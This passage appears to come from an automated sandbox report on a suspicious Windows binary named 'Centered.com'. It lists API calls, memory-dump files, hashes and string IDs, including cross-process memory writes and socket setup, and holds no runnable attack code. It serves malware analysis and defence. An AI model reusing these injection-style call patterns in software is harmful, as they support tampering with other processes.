                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2988ad24e18b94d358ce1fae170054afe265775a01dd7b645c3891da14bb8f22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F201A271800B15DFCB31AF66D980816F7F5BF503253158A3FD19A52931CBB0A944EF81
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F665BF
                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F665D6
                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00F665EE
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00F6660A
                                                                                                                                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00F66624
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 137e4a8d4b4613037bb6bf43352e8423bf6eb99a0fd420a87072e08686832f26
                                                                                                                                                                                                                                                                                        • Instruction ID: ca16fea8e1cd99cda8ca490b99f11de884cf79685daa118c13fa1a14f7d4cee7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 137e4a8d4b4613037bb6bf43352e8423bf6eb99a0fd420a87072e08686832f26
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC018631900308ABEB305F10EE4EB967B7CFB00705F04055AA187A20E1DBF5AA54AA90
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAE4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DAF6
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DB08
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DB1A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 515cda88ec15c850507b67f6f91a535b5485ba9c764c1f06a405d1c55284ec9b
                                                                                                                                                                                                                                                                                        • Instruction ID: 84d618f89b58212d2b3b75a9b04a37499f2984f5f308a362d51bad26728af522
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 515cda88ec15c850507b67f6f91a535b5485ba9c764c1f06a405d1c55284ec9b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAF01D72944208ABC664EB68FEC2C1AB7EDEE44730BA50C19F109D7551CB38FC80AA64
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3262E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32640
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32653
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32664
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F32675
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4582bec01da7e2b7bc2d2af40cbeae31ec6df843513ac7367bc44e3431ef03b7
                                                                                                                                                                                                                                                                                        • Instruction ID: 1d7246feea13104673fd8224d01b73b533e131f5c5e99b4c1d15ab8470f5e48d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4582bec01da7e2b7bc2d2af40cbeae31ec6df843513ac7367bc44e3431ef03b7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F0FE748031289B9782AF74FD82C497B66FB647717050A1BF514D72B5C7360901BFD4
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F62B1D,?,?,00000034,00000800,?,00000034), ref: 00F6BDF4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F630AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F62B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00F6BDBF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00F6BD1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F6BD2C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F6BD42
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F6311A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F63167
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\322891\Centered.com,00000104), ref: 00F31AD9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F31BA4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F31BAE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-3825628454
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F6CBB1
                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00F6CBF7
                                                                                                                                                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD29C0,016E5460), ref: 00F6CC40
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F9DCD0,00000000,?,?,?,?), ref: 00F94F48
• GetWindowLongW.USER32 ref: 00F94F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F94F75
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
  • Part of subcall function 00F83DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F83AD4,?,?), ref: 00F83DD5
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
• _wcslen.LIBCMT ref: 00F83AF8
• htons.WSOCK32(00000000,?,?,00000000), ref: 00F83B63
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F949DC
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F949F0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00F94A14
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F951A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F951B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F951B8
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F942DC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F942EC
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F94312
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                        • String ID: Listbox
                                                                                                                                                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F7544D
                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F754A1
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,00F9DCD0), ref: 00F75515
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F94CED
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F94D02
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F94D0F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F63712
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63723
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: GetCurrentThreadId.KERNEL32 ref: 00F6372A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F63731
                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 00F638C4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6373B: GetParent.USER32(00000000), ref: 00F63746
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F6390F
                                                                                                                                                                                                                                                                                        • EnumChildWindows.USER32(?,00F63987), ref: 00F63937
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                        • String ID: %s%d
                                                                                                                                                                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F96360
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F9638D
                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 00F9639C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F5E797
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 00F5E7BD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                        • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60EE0
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60EF8
                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00F9DCE0,000000FF,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60F1D
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00F60F3E
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 314563124-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F8B10C
• Process32FirstW.KERNEL32(00000000,?), ref: 00F8B11A
  • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
• Process32NextW.KERNEL32(00000000,?), ref: 00F8B1FC
• CloseHandle.KERNEL32(00000000), ref: 00F8B20B
  • Part of subcall function 00F1E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F44D73,?), ref: 00F1E395
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: 4c95d6855f00fedfa41132782eb5a5c0e0b67c339ede244fef97da9f653f909b
• Instruction ID: ae3f1ffddbb161d0b603743cbe8719bd8b5f3473dc13e895dd193c00a323d3df
• Opcode Fuzzy Hash: 4c95d6855f00fedfa41132782eb5a5c0e0b67c339ede244fef97da9f653f909b
• Instruction Fuzzy Hash: C9514D71908301AFD310EF24DC86A9BBBE8FF89754F40491DF58597291EB74E904EB92
APIs
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 8d04c5478cd30e65b46abbfc884e060a73f4ff378c27b00c78956c9f7f181fb3
• Instruction ID: 115aa63b770e6ed08e2c92806ea5764509363327e91714fcf3dd7d50f1fbcb66
• Opcode Fuzzy Hash: 8d04c5478cd30e65b46abbfc884e060a73f4ff378c27b00c78956c9f7f181fb3
• Instruction Fuzzy Hash: 5C411832A10114ABDB216BB99C42B6E3EA4FF41770F140225FC18D6291E77D48C1B661
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00F8255A
• WSAGetLastError.WSOCK32 ref: 00F82568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F825E7
• WSAGetLastError.WSOCK32 ref: 00F825F1
Memory Dump Source
